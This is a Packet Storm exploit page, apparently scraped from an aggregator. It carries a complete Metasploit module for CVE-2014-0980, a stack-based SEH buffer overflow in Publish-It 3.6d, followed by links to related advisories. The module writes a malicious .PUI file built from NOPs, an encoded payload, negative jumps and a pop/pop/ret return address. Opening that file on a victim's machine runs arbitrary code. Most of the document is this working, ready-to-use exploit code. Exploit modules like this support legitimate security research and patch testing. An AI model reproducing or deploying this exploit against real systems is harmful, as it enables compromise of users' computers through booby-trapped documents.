Lucene search
Daniel KazimirowPACKETSTORM:130907HistoryMar 19, 2015 - 12:00 a.m.
Publish-It PUI Buffer Overflow
2015-03-1900:00:00
Daniel Kazimirow
packetstormsecurity.com
27
0.962 High
EPSS
Percentile
99.4%
`##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Publish-It PUI Buffer Overflow (SEH)',
'Description' => %q{
This module exploits a stack based buffer overflow in Publish-It when
processing a specially crafted .PUI file. This vulnerability could be
exploited by a remote attacker to execute arbitrary code on the target
machine by enticing a user of Publish-It to open a malicious .PUI file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Daniel Kazimirow', # Original discovery
'Andrew Smith "jakx_"', # Exploit and MSF Module
],
'References' =>
[
[ 'OSVDB', '102911' ],
[ 'CVE', '2014-0980' ],
[ 'EDB', '31461' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0b\x0a",
'DisableNops' => true,
'Space' => 377
},
'Targets' =>
[
[ 'Publish-It 3.6d',
{
'Ret' => 0x0046e95a, #p/p/r | Publish.EXE
'Offset' => 1082
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Feb 5 2014',
'DefaultTarget' => 0))
register_options([OptString.new('FILENAME', [ true, 'The file name.', 'msf.pui']),], self.class)
end
def exploit
path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0980.pui")
fd = File.open(path, "rb")
template_data = fd.read(fd.stat.size)
fd.close
buffer = template_data
buffer << make_nops(700)
buffer << payload.encoded
buffer << make_nops(target['Offset']-payload.encoded.length-700-5)
buffer << Rex::Arch::X86.jmp('$-399') #long negative jump -399
buffer << Rex::Arch::X86.jmp_short('$-24') #nseh negative jump
buffer << make_nops(2)
buffer << [target.ret].pack("V")
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(buffer)
end
end
`
Related
prion
prion
Buffer overflow
2014-02-11 17:55:00
seebug
seebug
PosterSoftware Publish-it '.PUI'ζδ»Άε€ηηΌε²εΊζΊ’εΊζΌζ΄
2014-02-19 00:00:00
Publish-It 3.6d - Buffer Overflow Vulnerability
2014-07-01 00:00:00
checkpoint_advisories
checkpoint_advisories
zdt
zdt
Publish-It 3.6d - PUI Buffer Overflow (SEH) Exploit
2015-03-19 00:00:00
Publish-It 3.6d - Buffer Overflow (SEH) Exploit
2015-03-19 00:00:00
Publish-It 3.6d - Buffer Overflow Vulnerability
2014-02-06 00:00:00
securityvulns
securityvulns
CORE-2014-0001 - Publish-It Buffer Overflow Vulnerability
2014-02-11 00:00:00
exploitpack
exploitpack
Publish-It 3.6d - Buffer Overflow
2014-02-06 00:00:00
metasploit
metasploit
Publish-It PUI Buffer Overflow (SEH)
2015-02-18 18:22:54
packetstorm
packetstorm
Publish-It 3.6d Buffer Overflow
2014-02-06 00:00:00
cve
cve
CVE-2014-0980
2014-02-11 17:55:00
coresecurity
coresecurity
Publish-It Buffer Overflow Vulnerability
2014-02-05 00:00:00
cvelist
cvelist
CVE-2014-0980
2014-02-11 17:00:00
exploitdb
exploitdb
Publish-It 3.6d - Buffer Overflow
2014-02-06 00:00:00
Publish-It - '.PUI' Local Buffer Overflow (SEH) (Metasploit)
2015-03-19 00:00:00